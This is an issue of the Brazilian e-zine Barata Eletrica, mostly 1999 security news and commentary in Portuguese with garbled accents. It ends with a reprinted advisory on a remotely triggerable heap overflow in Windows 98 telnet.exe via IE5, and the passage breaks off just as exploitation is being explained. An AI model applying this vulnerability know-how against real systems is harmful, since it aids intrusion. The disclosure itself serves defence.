Barata Eletrica22:(NEWS22.TXT):08/01/2000 << Back To Barata Eletrica22


Pßgina Inicialhttp://www.inf.ufsc.br/barata Email derneval@bigfoot.com ═ndice barata22.html --------------------------------------------------------------------------- NEWS - DICAS - LINKS - HUMOR - MISCEL┬NIA Estπo aparecendo hip≤teses para deixar o homem mais ligado com o computador. A idΘia Θ usar um chip para enviar impulsos nervosos ao cΘrebro e controlar a depressπo. E a idΘia estß pegando adeptos lß nos EUA. Realmente, quem nπo se lembra o passado estß condenado a repeti-lo. Nπo sou nada contra o bem estar das pessoas. Mas se Θ possφvel fazer um chip para controlar o estado emocional da pessoa, nπo seria possφvel fazer um chip para controlar a pessoa? http://cnnenespanol.com/salud/1999/ 10/12/marcapasos.cerebro/index.html ------------------------------------------------------------------------------ Saiu na Folha 14 de Outubro de 1999 - O cara suspeito de estar envolvido no grampo do BNDES, tΘcnico Walter de Souza Braga foi funcionßrio da antiga TELERJ. Por estar envolvido em gravaτ⌡es ilegais jß naquela Θpoca. Serß que as telef⌠nicas atuais estπo com funcionßrios responsßveis e que zelam pela privacidade da comunicaτπo do cidadπo? Ou precisa aparecer um escΓndalo de grampo com gente gra·da para o cidadπo pode estar tendo seu telefone grampeado ou sua correspondΩncia lida? ------------------------------------------------------------------------------ Serß que nπo estπo exagerando os danos provocados por hackers? Aqueles que estπo acompanhando o caso Mitnick (http://www.freekevin.com) viram como, de uma hora para outras, as empresas supostamente atingidas por aτ⌡es supostamente cometidas pelo hacker trouxeram estimativas que mais tarde foram comprovadas "pouco acuradas". Comeτaram com $299,927,389.61 e depois caφram para meros $1.5 million (ver zdnn ).Nessa pßgin no http://www.aviary-mag.com/Martin/ Defacto_Damage/defacto_damage.html , Brian Martin comenta algumas coisas interessantes. Como por exemplo, o SPA ( http://www.spa.org/piracy/programs/98table.htm ) pode avaliar prejuφzos com a pirataria de software em exatos $3,074,266,000,00 ? Uma idΘia Θ que existe uma necessidade de que o prejuφzo atinja determinado valor para que valha a pena sua condenaτπo. Entπo, US$ 10.000,00 Θ pra fazer o FBI se interessar. O n·mero de zeros Θ para fazer o p·blico prestar atenτπo na soma do prejuφzo e comeτar a protestar. Por outro lado, me lembro quando as primeiras notφcias e emails sobre roubo de contas correntes ou de caderneta de poupanτa bancos via internet comeτaram a aparecer na Internet. Sempre o banco dizia que era culpa do cliente. Eram notφcias esparsas e nπo muito detalhadas. A televisπo mal noticiou qual os bancos eram mais afetados. Custou muito a admitir que pudesse haver falhas com o sistema de senhas, jß que os alvos eram em vßrios casos, pessoas de idade. Precisou acontecer um n·mero significativo de clientes afetados. Tudo isso para uma coisa que foi comprovada insegura hß varios anos, pelo Chaos Computer Club, na Alemanha, ver http://www.ccc.de/radioactivex.html. Estranho, nΘ? Ainda assim vßrias reportagens insistiram em falar que os responsßveis por essas fraudes por computador eram hackers. Ladrπo de banco virou hacker, agora? Uma coisa que pode atΘ estar sendo feita internamente Θ obra de hackers? Mais alguns sites sobre o assunto: http://www.roachmill.demon.co.uk/demo/activex/index.htm http://www.geog.ubc.ca/snag/bugtraq/msg00602.html http://www.microsoft.com/security/bulletins/ms99-037.asp ------------------------------------------------------------------------------ De acordo com o IDG Online, 16/08/99, o governo americano estß procurando cybersoldados. Os caras vπo ter que substituir 32 mil caras ano que vem, conta da aposentadoria. ------------------------------------------------------------------------------ Os caras que invadiram os sistemas da Nasa e do exΘrcito americano em 96 , os suecos Charlie Malm e Joel Soederberg, foram processados.. parece que serπo multados, mas nπo vπo puxar ferro por conta disso, jß que nada foi roubado. http://dailynews.yahoo.com/h/ap/19990816/ wl/sweden_hackers_1.html ------------------------------------------------------------------------------ πo falando que a lei de crimes de informßtica estß chegando.. 3 anos de prisπo no mßximo e 4 se o crime informßtico for cometido contra o Estado. (InfoNews, 06/08/99) . Essa foi muito legal: hackearam uma pßgina anti-gay lß nos EUA. Achei engraτado, mas tambeΘm tem o fato que isso trouxe uma baita publicidade para a mesma.. http://cnn.com/TECH/computing/ 9908/23/hack.folo/index.html e http://www.wired.com/news/news/ politics/story/21351.html ------------------------------------------------------------------------------ Lembram do tal hacker israelense, aquele que virou manchete em todo mundo por invadir o Pentßgono, lß nos EUA? Nπo sei se aconteceu alguma coisa a ele, mas o John Vranesevicc,ou JP, do Antionline, o site responsßvel pelas entrevistas com o cara e com muitos outros pretensos ratos de computador, tß na lama. Pior que titica de cavalo de bandido mexicano. O pessoal estß direto desmascarndo o indivφduo como tendo feito um site de notφcias "hackers" prΘ-fabricadas. Uma idΘia interessante: o cara quer se promover como pseudo cracker, hacker ou o que seja. Vai no Antionline (ia, agora a coisa tß brava). Faz uma coisa qualquer e divulga. Em outras palavras, criava notφcia exclusiva para o site. Que apareceu na TV, comeτou a receber patrocinadores e coisa do gΩnero. Tß todo mundo tacando pedra. Veja umas partes da da hist≤ria em http://www.attrition.org/negation/errata.html , http://www.forbes.com/columnists/penenberg/1999/0927.htm , http://www.hackernews.com/orig/CWD0899.html , http://www.nytimes.com/library/tech/99/ 10/cyber/articles/08hackers.html . Tß querendo ganhar dinheiro com hacking, tirou o Packet Storm do seu site, enrolou e enganou gente. Merece o que estß recebendo. (origem: http://www.hackernews.com) ------------------------------------------------------------------------------ Vai rolar uma conferΩncia hacker na Col⌠mbia. Fui na pßgina deles (http://colcon.virtualave.net ), algo pesado e difφcil de entrar, precisa de Netscape 4.X. Pelo que entendi do FAQ, ainda estπo decidindo coisas como preτos, palestrantes, etc. A data vai ser 6,7, 8 e 9 de janeiro. Se eu tivesse dinheiro, talvez arriscasse. Talvez. A Col⌠mbia estß na relaτπo World's Most Dangerous Places (Lugares mais perigosos do mundo). O Brasil por enquanto ainda nπo entrou na lista. ╔ uma conferΩncia local, pelo que entendi. VocΩs me perguntam: E no Brasil? Eu respondo: Tamos pr≤ximo da votaτπo de uma legislaτπo anti-hackers. Periga da elaboraτπo de tal conferΩncia estimular uma lei proibindo a mesma. Que tal? E uma conferΩncia demora meses para ser organizada, quando nπo se tem dinheiro bancando. ------------------------------------------------------------------------------ FAMOSO SITE DEIXA DE EXISTIR - PQP J┴ ERA! - Veja uma parte da carta de despedida abaixo. ╔ o fim do mundo como n≤s o conhecemos A partir do dia 01 de novembro de 1999, a PQP cessarß suas atividades e deixarß de existir. Foram mais de dois anos trazendo o que havia de melhor em humor e diversπo na Internet. O aclamado, polΩmico e divertido site que entrou para a hist≤ria da Internet brasileira vai deixar uma lacuna em branco no coraτπo de todos os fπs...mais de 12.000 acessos por dia...dezenas de reportagens, prΩmios, indicaτ⌡es....mas nada dura para sempre. Chega um momento em que vocΩ Θ obrigado a tomar decis⌡es que vπo influenciar o resto da sua vida...vivemos fazendo isso a cada minuto, a cada segundo, a cada decisπo tomada, pois senπo, ficamos presos no mesmo lugar, parados, atΘ a morte. E, por esse motivo, a PQP tem que deixar de existir. Para que venham novas idΘias, para que surjam novos horizontes, para que cresτam novos ideais, para que possamos enfrentar novos desafios! Agradecemos a todos por esses dois anos inesquecφveis, onde aprendemos e crescemos muito, como pessoas e profissionais. Fica aqui um grande abraτo, e a promessa de que esse nπo Θ um adeus - e sim um atΘ logo! A gente se vΩ por aφ! A Ex-Equipe PQP ------------------------------------------------------------------------------ O FBI fez um vφdeo sobre hackers e high-tech crime. Pra ver se encoraja as empresas a divulgar os problemas que tem com crime por computador. O pessoal lß da Hackernews e computer underground estß doidinho da silva pra botar a mπo numa c≤pia desse vφdeo. Eu tambΘm. PorquΩ? Porque existem crimes por computador feitos por funcionßrios de dentro das pr≤prias empresas. E algumas empresas nπo revelam nada nπo Θ s≤ por temor de parecerem incompetentes. Mas tambΘm por medo de exporem estruturas de comando deficientes, gastos mφnimos com treinamentos ou sei lß, quem sabe, existΩncia de caixa 2? Pra nπo falar em desavenτas trabalhistas que geram funcionßrios rancorosos capazes de ir a forra via computador.. ╔, talvez o vφdeo convenτa Enfim.. essa notφcia tß no URL: http://dailynews.yahoo.com/headlines/local/state/ colorado/story.html?s=v/rs/19991118/co/index_2.html#3 ------------------------------------------------------------------------------ Mas achei melhor o que li na Gazeta Mercantil, tem um caderno de TI (Tecnologia de Informaτπo) e estavam falando justamente de hackers, seguranτa informßtica e assemelhados. S≤ que colocaram umas estatφsticas legais: os invasores externos representam o maior medo de administradores de sistemas. Mas o que causa maior dano Θ o usußrio destreinado. Esse Θ o que ainda provoca maior dano, vindo os usußrios nπo autorizados em seguida ( O principal 'hacker' estß na empresa Sπo Paulo, 8 de junho de 1999, Perigo maior estß na falta de treinamento S├O PAULO, 21 de setembro de 1999). Os invasores externos contam menos de 15% dos prejuφzos, segundo mapa fornecido pela Ernst&Young. Em primeiro lugar estπo as falhas de sistemas 67%, Erros nπo intencionais com 61%, Vφrus com 46%, etc Mas o medo dos hackers lidera no ÷que as empresas mais temem". 49%, vindo o medo de Funcionßrios nπo autorizados em seguida, com 46%. Ano 2000 estß chegando.. vc jß cancelou seu cartπo de crΘdito? Ouvi um papo que os bancos nπo estπo preparados para o bug do milΩnio. --------------------------------------------------------------------------------------- Um "hacker" enviou uma cartinha pro IDG! Falando que ia abandonar essa vida de crimes. Achei meio estranho, podia enviar pro Barata ElΘtrica. Mas tudo bem, eu demoro, mas publico. Tß lß embaixo, a dita: "Aviso: Este texto foi escrito por globher, e pode ser distribuφdo e publicado por qualquer brasileiro, contanto que nπo modifiquem seu conte·do. Como a maioria dos "hacks" sπo feitos: A maioria dos hackers utiliza um mΘtodo bem simples para hackear sites, eles hackeiam usando o FrontPage Explorer. Fixando seu servidor: Para fixar seu servidor, basta remover as extens⌡es do FrontPage ou configurar as permiss⌡es dos arquivos criando contas ou colocando a conta guest para somente leitura. Extras: Espero que este texto ajude vocΩ a fixar seu servidor e a evitar ataques hackers. Mas lembre-se, nenhum servidor Θ 100% seguro. Por que escrevi este texto: Esta Θ a ultima vez que devo acessar a Internet, por um bom tempo pretendo sair do mundo underground, pois percebi que hackear sites nπo ajuda em nada a melhorar o Brasil. Neste e-mail vocΩ encontra um texto escrito por mim explicando como fixar os servidores e aconselhando os jovens a nπo fazer o que eu fiz. Sinta-se livre para publicß-lo em seu site. Eu percebi que nπo Θ hackeando sites e prejudicando administradores que eu vou ajudar a melhorar o Brasil. Percebi que eu posso ajudar mais, dando comida a um faminto do que hackeando sites e colocando a culpa da situaτπo atual do Brasil em outras pessoas. P.S.: Eu nπo quero amenizar minha culpa por ter hackeado sites. Escrevi este texto para evitar que outras pessoas faτam o que eu fiz Deve ser por isto que um outro "hacker" que invadiu a NASA deixou sua mensagem lß. (contribuicao da Eliz, a feliz) --------- NASA owned??? nice to meet you NASA hehehe... i'm so happy!!! i'm in the moon ae gov brasileiro... nos nao vamos parar!!!! deixe o globher em paz.. e um garoto ainda....e globher, vc nao e o mister M p/ revelar os segredos! control-C,Inferno.br, ninguem pode nos parar o novo milenio esta ai.. e tempo de recomeτar JxLxMx (saindo de ferias por enquanto) http://www.attrition.org/mirror/attrition/1999/11/28/acquisition.jpl.nasa.gov/ --------------------------------------------------------------------------------------- S≤ pra aproveitar, o grupo Infernobr me mandou esta cartinha: Oi Derneval, vc q sempre acompanhou a cena brasileira e concedeu um espaco na BE, estamos reportando algo interessante Ordem dos advogados do Brasil (OAB) - www.oab.org.br foi hackeada pelo grupo inferno.br hoje (segunda). Veja o mirror no site da Securenet http://www.securenet.com.br/mirror/nov99/www.oab.org.br Veja a reportagem na IDG http://www.uol.com.br/idgnow/inet/inet1999-11-29e.shl Veja a reportagem na Securenet http://www.securenet.com.br/cgi-bin/news?query=29119906 Valeu terem enviado, mas pessoalmente, nπo acho isso interesante. Vai estourar numa lei anti-hacker bem severa. E a OAB nπo Θ exatamente culpada da quantidade de problemas que assola o pais (muito embora alguns advogados "pΘssimos" tenham passado no exame da ordem). Sou pela ordem. Este troτo de haquear pßginas do Governo para aparecer nπo Θ a minha praia. AtΘ o Governo fala mal do governo, hoje em dia. Eu acredito que o que eles querem e' estimular a entrada de uma legislacao anti-hackers. Pelo que pude descobrir varios sao caras entre 20 e 35 anos, com solida carreira na informatica. Sao analistas de sistemas querendo faturar como analistas de segurancas bem remunerados. Num dos casos, os caras ja' haviam feito analise das insegurancas dos sites do governo. Que tem mania de usar software da microsoft cheio de aberturas. As noticias desse gΩnero deixam meio p(*) da vida um pessoal responsßvel por outros sites, baseados em Unix, que estπo patcheados e ninguΘm entra. Achar um site inseguro e' questπo de procurar. --------------------------------------------------------------------------------------- Versπo final do regulamento para uso das redes de TV por assinatura pelos provedores de Internet finalmente sai. A Anatel publicou a coisa. Resta saber se vai funcionar. Espero que sim. Muita gente vai passar a noite em branco, ao usar internet via TV a cabo. http://www.anatel.gov.br/home/default_popup_flash.asp --------------------------------------------------------------------------------------- O linux vai virar o sistema operacional oficial do governo chines. Pois e', O que a Microsoft nπo conseguiu, a GraphOn foi la' e fez. Ponto para a Geraτπo GNU. http://uk.news.yahoo.com/991110/22/ax8w.html --------------------------------------------------------------------------------------- Esta foi de amargar.. um sujeito escondeu um telefone celular lß dentro para contrabandea-lo dentro de uma prisπo a 150kms de Bogotß, na Col⌠mbia (11/10/99).. ia ganhar 100.000 pesos se conseguisse. http://cnnenespanol.com/rarezas/1999/10/11/telefono.ap/index.html --------------------------------------------------------------------------------------- Um grupo criminal russo conseguiu acesso ilegal ao servico de noticias da Reuters. A parte mais chata da coisa e' que eles estavam vendendo esse acesso. Nao houve uma grande esperteza nessa estoria. Os caras simplesmente contrataram os servicos atraves de uma empresa de fachada. http://library.northernlight.com/FC19991102530000207.html?cb=0&dx=1006&sc=0#doc --------------------------------------------------------------------------------------- Romania: Algum "esperto" entrou numa pagina do governo e alterou a taxa de cambio do dolar e o imposto do salario do trabalhador. Por um dia, a coisa funcionou, quer dizer, ninguem notou. Ainda estao investigando a hackeada. Ate' que foi algo nao muito terrivel, porque qualquer pessoa que olhasse iria notar uma taxa de 100% de imposto em algumas profissoes (variava de acordo com a desimportπncia). http://news.cnet.com/news/0-1005-200-1427148.html?tag=st.ne.ron.lthd.1005-200-1427148 --------------------------------------------------------------------------------------- MTV FOI ENGANADA.. Os caras resolveram fazer uma reportagem sobre hackers para um programa da MTV, chamado Vida Real. (True Life: I'm a Hacker). A idΘia Θ aquela mesma que todos os jornalistas jß tiveram. Porque nπo pegar um cara que jß fez crimes informßticos e botar ele para contar sua hist≤ria. Conseguiram um sujeito, de nome Shamrock, que concordou em explicar tudo, tudinho. De acordo com o cara, ele nunca esperou que a MTV realmente "engolisse " a hist≤ria que tinha inventado. Na pßgina http://www.hackernews.com/orig/shamrock.html tem um bom relato da hist≤ria. Primeiro, os caras da MTV pediram uma help pro sujeito, que fazia um lance de Web TV onde o espectador tem acesso ao cara da reportagem e a outros espectadores que estejam assistindo o programa (ver parstv.com) Aφ o sujeito passou para eles alguns sites bßsicos, gente nos EUA que mexia com o assunto, tipo 2600, HNN, Defcon e L0pht. A MTV foi atrßs desse pessoal, filmou e prometeu pra todo mundo que seria algo "honesto". Mas nπo era o suficiente para a direτπo do programa, eles queriam algo "mais underground". Entπo Θ que o pessoal do Shamrock fez a armaτπo toda. Parece que incluφa cenas do sujeito "invadindo" sites, passando informaτπo "sigilosa" em disquete, fugindo da polφcia. Esse tipo de coisa. E os caras da MTV "engoliram". O Emmanuel Goldstein da 2600.com, atΘ comentou como foi em http://www.hackernews.com/orig/emmanuel.html . Disse que concordou com a filmagem principalmente porque poderia ajudar o Mitnick. Para finalizar, cheguei a ver a pßgina do programa, antes de tirarem do ar. Infelizmente nπo fiz download das gifs, htms e RAs, no dia seguinte nπo estavam mais lß. Eles se deram conta da mancada que deram e que foi noticiada por aφ, veja em: http://www.zdnet.co.uk/news/1999/41/ns-10798.html --------------------------------------------------------------------------------------- A moτada lß resolveu fazer "passeatas eletr⌠nicas" contra a "escuta internacional". Aqueles que leram meu artigo sobre isso, jß conhecem o lance (disponφvel em http://www.inf.ufsc.br/barata/grande20.html ). Pra simplificar, tem um monte de escutas nas redes de comunicaτπo do mundo inteiro. Essa escuta beneficia s≤ alguns paφses e governos. Como envolve correio eletr⌠nico, a moτada estava se propondo a emitir correios eletr⌠nicos cheios de palavras chaves, para confundir e ativar os programas de escuta (que nem acordar aqueles caras que s≤ prestam atenτπo em conversas que tem assuntos que interessam, como dinheiro, mulher, falando essas palavras). Existe alguma coisa sobre essa campanha na pßgina http://cnn.com/TECH/computing/9910/22/internet.spying.ap/index.html . Que fez sucesso pois foi publicada em jornal. SE realmente conseguiram confundir as escutas? Provavelmente nπo, mas divulgaram sua existΩncia, algo antes considerado como paran≤ia. O pessoal esta' cada vez mais publicando noticias do ECHELON. Depois de fazerem um dia anti-echelon, cada vez mais aparecem artigos na imprensa nao especializada. Para quem nao sabe, esse sistema espia cada fax, telefone ou correio eletronico que passa pelos satelites do mundo. Transforma voz em texto e procura palavras chaves, como "terrorismo", "matar presidente dos EUA", etc. Se detecta essa ou aquela palavra de uma lista, ele comeca a copiar a comunicacao onde "escutou" a coisa. Para posterior exame. O dia do Echelon era uma ideia de entupir a rede com palavras que fizessem soar o alarme. Especialistas acreditam que a coisa do ponto de vista de software, nao funcionou. Mas em propaganda, parece que sim, porque mais e mais publicacoes estao alertando para algo do qual nao se falava. Ver os links abaixo: http://news.bbc.co.uk/hi/english/world/newsid_503000/503224.stm http://xechelon.org/ http://www.fcw.com/pubs/fcw/1999/1115/web-echelon-11-18-99.html --------------------------------------------------------------------------------------- Foi constatado que a companhia responsavel pelo software RealNetworks' RealJukebox esta' fazendo "escuta nos habitos dos seus usuarios. Quer dizer, o sujeito que usa o software acima tem suas preferencias em relacao a musicas, o que ouve e o que GRAVA. Ou seja, ao fazer download de uma musica a partir da internet, jogar uma musica do cdrom no seu micro ou simplesmente tocar esta musica no seu leitor de CDROM, isso e' informacao que e' armazenada, reunida num GUID (Global User Identification Data?) e mandado depois para a empresa. O perigo nao esta' tanto no ato em si. Mas se voce pensar no sonho do Bill Gates, de fazer todo mundo usar uma carteira contendo cada minuto de sua vida, isso e' perigoso. As pessoas nao podem ser vigiadas quando vao no banheiro ou quando gastam seu tempo livre. Hoje, se vigia qual musica voce gravou de um CD. Amanha, vao te cobrar um taxa por ter feito isso. Ja' pensou? http://news.cnet.com/news/0-1005-200-1425866.html?tag=st.ne.1002.thed.1005-200-1425866 Depois que descobriram isso, a companhia mudou um pouco a polφtica interna de privacidade http://home.cnet.com/category/0-1005-200-1426044.html --------------------------------------------------------------------------------------- Um artigo da Wired esta' colocando o Richard Smith como um "tesouro vivo" da Internet. E', ele ajudou a localizar o autor do Virus Melissa, a questao do GUID (um numerozinho que fica nos documentos feito pelo word 97 e que permite voce atribuir um arquivo como sendo feito num computador de fulano XXX), as praticas de coleta de dados da RealNetworks (que fornece um software de escuta de CDs pra micro onde as preferencias do usuario sao armazenadas e enviadas pra RealNetworks, uma forma de se fazer pesquisa de opiniao de musica sem o cara estar sabendo). O artigo sobre ele comenta seu interesse "desinteressado" pela privacidade na internet. Acho otimo ter um cara desses por ai'.. o duro e' acreditar que o cara e' um bom samaritano, mas legal que gente como ele exista. Palmas pra ele. http://www.wired.com/news/technology/0,1282,32252,00.html --------------------------------------------------------------------------------------- Trata-se de uma historia sobre um jogo de guerra desenvolvido e executado para simular uma acao real de conflito em que ataques de forma eletronica sejam executados. Para quem nunca jogou "WAR", esta simulacao nao precisa envolver computadores. Apenas se joga com umas variantes, como "organizacao terrorista usa computador pra sacanear com sistema telefonico" e por ai' vai. Como se considera atualmente que os EUA estao despreparados para ataques desse tipo, a inteligencia norte americana comecou a fazer uns estudos de simulacoes desses acontecimentos. Maiores informacaoes na pagina. http://www.latimes.com/news/asection/19991031/t000098778.html "Uma tφpica Sexta a tarde de chuva, em Sπo Paulo [..] : ruas cheias de lixo com inundaτπo, rios nas principais avenidas, trabalhadores presos no trßfego por horas, blackouts e fones nπo funcionam.." http://news.excite.com:80/news/r/991119/15/tech-yk-latam Este artigo comenta que os latino-americanos (nos brasileiros incluso) estamos tπo acostumados com enchentes, desgraτas de todo tipo que nem levantamos o olho para uma coisa chamada Y2K. Parece que foi um brasileiro(a) (da Mary Milliken) que escreveu o texto, estß muito engraτado. --------------------------------------------------------------------------------------- Uma tentativa de impedir que qualquer um tenha acesso a sua informacao medica. Ou seja, se voce ja' foi alcoolatra, se ja' transou sem camisinha (contraiu sifilis) ou coisas que podem ser embaracosas em algum momento de sua vida (como numa entrevista pra emprego). O presidente Clinton fez um plano que coloca restricoes em como essas informacoes estao sendo usadas. As pessoas envolvidas teriam que ser notificadas quanto ao uso das informacoes e deveriam ter facilidade para altera-las. Claro que nao e' tudo o que se espera. So' a partir de 21 de fevereiro e' que isso vai acontecer. Aqui no Brasil, mal se tem o habeas data e poucos advogados sabem usa-lo. http://www.zdnet.com/zdnn/stories/news/0,4586,2384723,00.html?chkpt=zdnntop Quebraram a protecao de filmes DVD Hoje, os arquivos dvd nao sao copiaveis. Sao filmes de cerca de 4.7 Gigabytes em diante. A partir do ano que vem, se espera uma geracao de gravadores que permitam esse tipo de coisa, vao pintar drives DVD regravaveis pro publico comum. Entao, presumindo que um cara realmente quisesse usar isso, os CDs DVD estao protegidos por um software chamado Content Scrambling System (CSS), que usa chaves de 40bits. Era considerado um esquema de protecao forte. Mas uma empresa esqueceu de encriptar a chave do DVD e 2 caras descobriram mais info sobre o esquema de protecao. Fizeram um programinha de 60kb, o DeCSS, capaz de copiar o bagaca toda. Cada disco teria umas 400 chaves de descriptografacao. A ideia era que nao se pudesse fazer engenharia reversa e descobrir como funciona o software. Mas bastou esse descuido e agora esta informacao esta' por ai', rolando em algum lugar da NET. http://www.wired.com/news/technology/0,1282,32263,00.html O Bruce Schneier, grande especialista no assunto (t⌠ caindo de sono, esqueci o livro do cara) botou um texto sobre o assunto, disponφvel em http://www.zdnet.com/zdnn/stories/comment/0,5859,2391975,00.html O pessoal que faz os DVDs Θ que nπo tem muito senso de humor, estπo fazendo uma caτa as bruxas e vßrias pßginas sobre o assunto, muito bem desenhadas mesmo estπo saindo do ar, por medo de represßlias de vßrios tipos. O software ainda pode ser encontrado em alguns lugares e um "Digest " sobre DVD estß se mantendo no ar, apesar dos pesares. Quem procura, acha. http://www.wired.com/news/politics/0,1283,32449,00.html --------------------------------------------------------------------------------------- Ainda existe esperanca. O congresso norte-americano nao esta' financiando a fundacao de uma rede de seguranca contra intrusos. E' aquela coisa.. a intencao explicita seria combater terroristo on-line. Mas e' uma coisa que pode ser usada para vigiar pessoas online e off-line. Resultando que poderia ser usada para invadir a privacidade de gente como a gente. Ainda bem que la' nos EUA estao brecando isso. Apesar que tambem se esta' falando que os defensores do projeto vao continuar tentando.http://www.govexec.com/dailyfed/1199/110399b3.htm Informe Oficial da II Expo Salt Dias 29 e 30 de Janeiro de 2000 Rio de Janeiro - Niteroi A ExpoSALT oferece α comunidade acadΩmica o II Evento de Sistemas Alternativos, com a presenτa de Grupos de Usußrios de Linux, AMIGA, OpenBSD, BeOS, MSX, FreeBSD entre outros. O evento serß realizado nos dias 29 e 30 de janeiro de 2000, na Escola de Engenharia da UFF - Av. Passos da Pßtria, 50 - Campus da Praia Vermelha (Praia da Boa Viagem), na cidade de Niter≤i/RJ, este alΘm das Palestras Tecnicas que ofereceremos, teremos: Mini-Cursos, Foruns de discurssπo, Feira de empresas, Stands de Grupo de Usußrios/Empresas e o 1o Install Fest de Linux Carioca. A Associaτπo SALT tem como o objetivo α divulgaτπo de atividades nas ßreas de sistemas alternativos, em andamento ou recentes, e incentivar a integraτπo e o intercΓmbio entre empresas, professores programadores e estudantes de diversos centros do paφs. Assim, reunimos uma vez por ano, em Janeiro, para a realizaτπo do ·nico evento voltado a sistemas operacionais alternativos e que tem como objetivo principal a divulgaτπo de e a apresentaτπo de soluτ⌡es em informßtica baseada nos mesmos. A ExpoSALT 2000 contarß com palestras/apresentaτ⌡es sobre os seguintes sistemas operacionais e/ou plataformas alternativas: - Amiga (AmigaOS) - BeOS - FreeBSD - Linux - MacIntosh (MacOS) - OS/2 - QNX - Tropix - DosVOX Maiores informaτ⌡es (incluindo descriτ⌡es mais detalhadas das palestras e informaτ⌡es sobre os ministrantes) podem ser encontradas na pßgina do evento: http://www.wb.com.br/exposalt. Informaτ⌡es sobre as inscriτ⌡es para o evento tambΘm podem ser encontradas na mesma pßgina. --------------------------------------------------------------------------------------- N├O ╔ PIADA Isso apareceu na lista Piadas -l > Recebemos recentemente um aviso sobre um novo golpe que estß > sendo praticado e gostarφamos de alertß-lo sobre este golpe: > > "Assaltantes astutos estπo atacando de uma nova forma. Mandam > mensagens falsas para seu e-mail, fazendo-se passar por seu > provedor e pedindo para que vocΩ confirme o seu endereτo > residencial para recadastramento. > > Utilizam-se de e-mail fantasma, geralmente HOTMAIL, ZIPMAIL ou > MAILBR. Com o endereτo em mπos, organizam um assalto α sua > residΩncia. Talvez ap≤s dias ou atΘ mesmo meses. > > Segundo a Polφcia, estes bandidos estudam o seu cotidiano e, > quando encontram uma brecha, realizam o assalto. Muitos casos > semelhantes aconteceram em Sπo Paulo e, depois de longas > investigaτ⌡es, descobriram que as vφtimas tinham algo em comum: > eram Internautas. > > Quando verificados mais detalhes, uma surpresa: todos haviam > recebido esse e-mail, solicitando a confirmaτπo do endereτo e > de alguns dados como: quantos aparelhos de televisπo em casa, > aparelhos de som, veφculos, casa pr≤pria ou nπo, etc..., ou > seja, perguntas tφpicas de cadastramento mas que, na verdade, > servem de informaτπo para os assaltantes saberem dos bens que > existem na casa a ser assaltada. Sobre a Microsoft.. Grande BUG - O Service Pac 6 da Microsoft impede o acesso ao LOTUS NOTES. Essa Θ curiosa. Porque o ·nico jeito de usar o programa nesse caso seria fazer o NT dar privilΘgios de super usußrio para os usußrios comuns. Ou isso, ou as mensagens "Could not connect to server" "Access denied" aparecem.(fonte:Noticias Hispasec - 16-11-99) Quando me lembro que a prefeitura de Sπo Paulo tem uma intranet baseada no Lotus Notes, fico pensando o que Θ atualizar os NTs de lß. Qualquer funcionßrio do baixo escalπo podendo olhar mensagens do alto escalπo (claro que tem ser bonzinho em computador) sem grandes problemas. Para ler mais: http://support.microsoft.com/support/kb/articles/Q245/6/78.asp http://news.cnet.com/news/0-1003-200-1439342.html?tag=st.cn.1.lthdne http://infoworld.com/cgi-bin/displayStory.pl?991116.pinotesbug.htm ------------------------------------------------------------------------------ Pßgina comentando que a principal causa de perda de dados sπo apagamentos acidentais. Num teste realizado com 300 administradores de maquinas NT, 88% disseram que a principal causa de perda de dados sao apagamentos acidentais. 7% dao como causa apagamentos intencionais e 3% poem a culpa em virus. O uso inadequado de backups e' uma constante nessa percentagem de perda de dados. http://www.techweb.com/wire/story/TWB19991029S0008 ------------------------------------------------------------------------------ Achado vφrus de NT, o WinNT.Infis. Normalmente isso parecia coisa acadΩmica, mas o bicho nπo s≤ existe como foi encontrado "in natura" (descoberto por uma vφtima na R·ssia). Ataca estaτ⌡es de trabalho operando com NT 4 e service packs 2,3,4,5 e 6. ╔ um novo capφtulo nessa hist≤ria (Network World Online 11/10/99) ------------------------------------------------------------------------------ Falas-se da decisao de um juiz federal nos EUA. Finalmente se julgou a Microsoft culpada de monopolio. Pelas seguintes razoes: mercado amplo e estavel em todos os pcs baseados em chips intel, praticas anti-competicao etc.. Isso vai facilitar muito para outros processos contra a empresa, ja' que nao terao que provar o mesmo tipo de coisa (se fosse no Brasil, essa vitoria nao significaria nada pra quem estivesse correndo processo contra a Microsoft). Pode ser que isso signifique o desmembramento da empresa. http://cnnfn.com/1999/11/05/technology/microsoft_finding/ ------------------------------------------------------------------------------ O site da Microsoft foi invadido. Ver http://www2.uol.com.br/info/infonews/101999/26101999-19.shl ouou http://www.msnbc.com/news/327726.asp?cp1=1 ------------------------------------------------------------------------------ Como se livrar do Explorer no Win 98 http://www.98lite.net. ------------------------------------------------------------------------------ Recebi essa cartinha.. valeu Enigmatic Heap Overflow in windows 98 Telnet.exe - remote via IE5 ------------------------------------------------------------ Jeremy Kothe (jeremy@edi.com.au or paceflow@hotmail.com) More fun and games courtesy of Microsoft (c:)... Telnet.exe - (77824 bytes, 11th May 98) --------------------------------------- This version of Telnet (which ships as part of Windows 98) has a bug which allows a heap overrun. It assumes that the first command-line argument will be <255 chars when preparing for the "Connect Failed" message-box. The result is that a few crucial bytes can be written over, which, as the telnet app is closing, allow full execution of arbitrary code. See below for full details... This is still all local, though, so let's skip to the REMOTE part. IE 5.00.2314.1003/5.00.2314.1003IC ---------------------------------- Internet Explorer automatically invokes telnet when given an "rlogin:", "telnet:" or "tn3270:" protocol URL. Earlier versions of IE which I experimented with had comparitively tight restrictions on the format of the url, only allowing two parameters through (two zeros to you and me ;) As it turns out, this is not enough (for me) to exploit the bug. But with the versions named above, which as of writing include the latest version Microsoft would let me download, the restrictions seem to have been lifted. I can only assume that this is either unintentional, or that tn3270 or telnet applications have been found which makes this desirable... Whatever! The end result is that it seems the most recent versions of IE 5 will faithfully pass any collection of parameters up to about 460 chars into telnet.exe. Systems at risk --------------- Windows 98 default installation with SOME versions of IE5. If you click on a link, or are refreshed to a link, then see telnet.exe pop-up, complaining that it can't connect to a garbage-type address, DO NOT close the telnet executable. Instead, either forcefully terminate the process, or reboot. The exploit does NOT take effect until telnet.exe is closing. Solution -------- Either remove telnet.exe from the path, so IE cannot launch it, or get a copy of the WinNT telnet.exe. Exploit - introduction ---------------------- Heap overruns are not for the faint of heart. If you have trouble following stack overrun exploits, turn back now - or go and learn, then come back. With a stack overflow, getting the machine to execute into our buffer is relatively easy. We have, after all, overwritten the function return address. Point this (indirectly or not) at the esp and you're in business. Without this benefit, we have a much tougher time exploiting the overrun. In fact it is entirely possible that no exploit is possible. It all depends on what follows our buffer in memory. The best candidates for overwriting are pointers. If we can overwrite one which the program subsequently uses, we have a chance to make something happen. The trick is to 